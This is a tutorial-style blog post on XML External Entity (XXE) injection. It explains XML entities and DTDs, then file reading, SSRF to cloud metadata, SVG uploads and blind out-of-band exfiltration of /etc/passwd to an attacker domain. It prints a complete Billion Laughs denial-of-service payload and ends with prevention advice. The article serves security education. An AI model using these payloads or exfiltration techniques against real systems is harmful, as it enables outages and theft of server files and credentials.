Demystifying XML External Entity (XXE) Injection: A Comprehensive Guide

In this article, we will try to explain about basics of XML, what is XML External Entity (XXE) injection, why it arises, how it can be exploited & summarize how to prevent XXE vulnerabilities. If you already know about XML, you may jump into XXE directly.

VulnerabilityXXE InjectionHacker

Tuhin Bose

June 13th 2023.

Demystifying XML External Entity (XXE) Injection: A Comprehensive Guide

All About XML

i. Basics of XML

XML (eXtensible Markup Language) is a widely used markup language which is designed to store and transport data in a structured and human-readable format.

XML does not use pre-defined tags like HTML (such as img, h1 etc). Instead, tags can be given any relevant names that describe the data it contains. For example, we can use <book> to store book name, author & number of pages.

XML follows a hierarchical structure, where data is organized into a tree-like format. The fundamental building block of an XML document is an element. An element consists of an opening tag, content, and a closing tag. In the below example, <book> is the root element and it contains 3 child elements: <title>, <author> & <length>.

Simple XML Document

ii. XML Entities

XML entities are an essential component of XML standard which allow you to represent special characters, predefined entities, or custom entities within an XML document. For example, the entities < and > represent the characters < and > respectively. These are metacharacters used to denote XML tags, and so they should be represented using their entities when they appear within data, otherwise will conflict with the XML syntax.

XML provides five predefined entities that represent commonly used characters:

XML Entities

These predefined entities are necessary because their respective characters have special meanings in XML syntax. By using these entities, we can include these characters in XML content without causing any errors.

iii. Document Type Definition (DTD)

XML documents can contain a document type definition (DTD), which defines the structure of an XML document and the data it contains. It specifies what elements can be used, in what order, and what attributes they can have.

Let's say we have an XML document for a library. The DTD for this particular XML document would define the structure of the document, such as the elements like book, author, and title and publication date. It would also specify rules about the order in which elements should appear.

Sample DTD

These DTDs can be loaded from external sources or declared in the document itself (like previous example) within a DOCTYPE tag at the start of the XML document.

iv. XML custom entities

XML custom entities are used within the DTD to represent and reference reusable pieces of data or text. There are two types of custom entities in XML: Internal Entities and External Entities.

Internal Entities: An internal entity is defined within the DTD or the document itself. It is declared using the <!ENTITY> declaration. The replacement value of an internal entity can be any valid text, including XML markup.

<?xml version="1.0"?>
<!DOCTYPE allemployees [
  <!ELEMENT allemployees (employee)>
  <!ELEMENT employee (name, department)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT department (#PCDATA)>
  <!ENTITY dept "Security">
]>
<allemployees>
  <employee>
      <name>Tuhin Bose</name>
      <department>&dept;</department>
  </employee>
  <employee>
      <name>Devang Solanki</name>
      <department>&dept;</department>
  </employee>
  <employee>
      <name>Sivadath KS</name>
      <department>&dept;</department>
  </employee>
</allemployees>

In the above example, the entity “dept” is defined with the replacement value “Security” (Line 7). So whenever the “dept” entity reference will be used (Line 12, 16, 20) within the XML document, it will be replaced with the value “Security”.

External Entities: An external entity is defined in a separate file and referenced within the XML document. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. The replacement value of an external entity is the content of the referenced file.

Accessing Remote files

So whenever the "website" entity reference will be used, it will be replaced with the content of "https://bugbase.in/hey.txt". The file:// protocol can also be used to load external entities from local files. For example,

Accessing Local files

XML External Entity Injection (XXE)

What is XXE?

XML External Entity Injection is a popular vulnerability that arises when an application process user supplied XML data on the server using a poorly configured XML parser. An attacker can exploit XXE vulnerability to read arbitrary files from the server, achieve SSRF, perform Denial of Service attack & even exectute arbitrary commands on the system.

Why XXE arises?

Instead of JSON or form-data, some applications use XML to transmit data between the application and the server. They generally use a standard library or platform API to process the XML data on the server. XXE arises due to the improper handling of external entities by these XML parsers.

Exploitation

There are various types of XXE attacks. In this article, we'll try to explain the major ones:

i. Access Files from the Server: We can create an external entity containing the contents of a file, and use the entity reference to view the response. Let's assume that there is a hospital management portal which checks for admitted patient's details by sending the following HTTP request to the server:

POST /checkDetails HTTP/1.1  
Host: hospitalportal.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US  
Pragma: no-cache  
Content-Type: application/xml  
Content-Length: 110  
Upgrade-Insecure-Requests: 1  
  
<?xml version="1.0" encoding="UTF-8"?>  
<hospital>  
<wardId>3</wardId>  
<patientId>19</patientId>  
</hospital>

If the patientId doesn't match with the database, it'll show something like "The patientId 19 doesn't exist in our database." otherwise it'll return the details of the patient. Point to be noted that the patientId (in this case, 19) will be reflected in the response if it doesn't exist in the database. So, we can create an external entity which'll contains the contents of /etc/passwd & give reference to the entity inside patientId. Since the specific patientId won't exist in the database, it'll return something like The patientId <content of /etc/passwd> doesn't exist in our database. So the payload will be

Access Sensitive Files from the Server

ii. Server Side Request Forgery (SSRF) through XXE: In addition to retrieving system files, XXE can be utilized to launch SSRF attack. For example, to invoke a HTTP request, we can specify the following xml body

Invoking HTTP Request

If the application is hosted on an aws ec2 instance, we can try accessing the AWS metadata endpoint.

Accessing AWS Metadata Endpoint

iii. XXE via image file upload: Some applications allow users to upload images which are being processed/validated on the server side using image processing libraries. Apart from usual image file formats (such as JPEG, JPG or PNG), these image processing libraries might support SVG images also. Since the SVG format uses XML, an attacker can try to upload a malicious SVG image which will result in XXE vulnerability. Let’s understand the following SVG payload:

Malicious SVG Image

First four lines are already explained in the previous sections. In the next line, we've defined the width and height of the SVG image (in pixels). Next, we've defined the font-size of the characters of /etc/passwd file (i.e. content of &myfile;) using font-size attribute within <text> tag. The other attribute x and y defines the axis on which the text is going to render.

iv. Dos (Billion Laugh Attack): We can perform denial of service attack via XXE. This attack is also known as Billion Laugh attack. It occurs when the xml parser continually expands each entity within itself, which overloads the server and results in denial of service. Let’s understand the following xml document

<?xml version="1.0"?>  
<!DOCTYPE lolz [  
<!ENTITY lol "lol">  
<!ELEMENT lolz (#PCDATA)>  
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">  
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">  
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">  
]>  
<lolz>&lol9;</lolz>

First, we have defined an internal entity lol as "lol" (line 3). In the 5th line, we've again defined an entity lol1 which'll call the entity lol 10 times which means it'll be "lollollollollollollollollollol". Again we've defined an entity lol2 which will call the entity lol1 10 times that means it’ll be "lollollol… 100 times". By this way, the entity lol9 would be "lollollollol…..10⁹ times". Finally in the last line, lol9 will be called, it'll try to print "lollollollol…..10⁹ times". This amount of processing and the size of the string causes a denial of service as the XML parser quickly exhausts the system's resources.

v. Remote Code Execution (Rare): In some rare cases, PHP expect module may be loaded which allows us to execute arbitrary commands using the following payload:

Executing "id" Command

vi. Modifying Content-Type: Some applications might support content types other than the one which is generated by its frontend HTML form. So we can try to change the content-type from the default one (URL-encoded or JSON) to XML. For example, the request body username=tuhin1729 or {"username":"tuhin1729"} can be changed to <?xml version="1.0" encoding="UTF-8"?><username>tuhin1729</username>.

vii. Blind XXE: Now let's discuss about Blind XML External Entity Injection. In the previous example of hospital management portal, we've assumed that the application returns the value of an element within its responses (if the patientId doesn't match with the database, it'll show something like "The patientId 19 doesn’t exist in our database."). Blind XXE occurs when the application is vulnerable to XXE but does not return the values of any element within its responses. It means that we can not directly see the output. To detect a blind XXE, we can trigger an out-of-band network interaction to our burp collaborator using the SSRF through XXE technique. Now before understanding exploitation of blind xxe, we need to understand some basic concepts about xml parameter entities. In some cases, regular xml external entities are blocked because of some input validation by the application. In these cases, we may use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. To decrale a XML parameter entity, we need to use the following syntax:

<!ENTITY % bugbase "Indian Bug Bounty platform" >

Parameter entities are referenced using the percent character (%bugbase) instead of the usual ampersand which we've used in XML external entity. Now in case, regular xml external entities are blocked, we can detect blind XXE by the following payload:

Triggering out-of-band network interaction

This payload defines an XML parameter entity myweb and then call it within the DTD using %myweb. If the application is vulnerable, this will cause DNS lookup and HTTP request to bugbase.in (i.e. attacker's domain).

Generally, there are two ways to exploit blind XXE:

(I) Exfiltrate data using out-of-band network interactions: Once we've detected blind xxe vulnerability, next step is to exfiltrate sensitive data. For this, we need to host a malicious DTD in our server & invoke the external DTD within the xml payload. To exfiltrate the contents of the /etc/passwd file, save the following DTD in your server as bugbase.dtd

bugbase.dtd

Here is the explanation of the above payload:
Line 1: We've defined an XML parameter entity myfile which contains the content of the file /etc/passwd .
Line 2: We have defined an XML parameter entity eval which contains a dynamic declaration of another XML parameter entity exfil. Once the exfil entity will be called, it'll send a HTTP request to the attacker controlled domain attacker.bugbase.in & send the content of /etc/passwd (using myfile entity) through the GET parameter data.
Line 3: Here we've called the eval entity so that the declaration of the exfil entity is performed.
Line 4: Finally, we've called the exfil entity to invoke the HTTP request.

Now we need to invoke this external DTD within our xml payload.

Invoking the bugbase.dtd

The above payload defines an XML parameter entity tuhin and calls the entity within the DTD. This will cause the XML parser to fetch the external DTD from attacker’s server and process it. Then the malicious DTD will be executed, and the content of /etc/passwd will be sent to the attacker's server.

(II) Trigger XML parsing errors to reveal sensitive data: This technique will only work if the application returns the error message in the response. Here the main idea is to trigger an XML parsing error where the error message contains the sensitive data. We can do so by trying to include a non-existent file using XML parameter entity. Let’s take a look at the following payload:

Including non-existent file to cause errors

In the first line, we've defined an XML parameter entity myfile which contains the content of the file /etc/passwd. Next, we've defined another XML parameter entity eval which contains declaration of the XML parameter entity myerror. The myerror entity will try to get a non-existent file whose name contains the value of the myfile entity (i.e. the content of /etc/passwd). Then, we've called the eval entity so that the declaration of the myerror entity is performed. Finally, we've called the myerror entity to invoke the error since the file doesn't exist.

Now we need to invoke this external DTD within our xml payload.

Invoking the bugbase.dtd

If the application is written in java, it'll reflect an error like:

java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
...

Prevention

Generally, XXE vulnerability arises due to the improper handling of external entities by these XML parsers. The easiest and most effective way to prevent XXE attacks is by disabling external entities and support for XInclude. Additionally, a web application firewall (WAF) can be implemented that can block XXE inputs. For more detailed prevention strategies, take a look at OWASP XXE Prevention Cheat Sheet.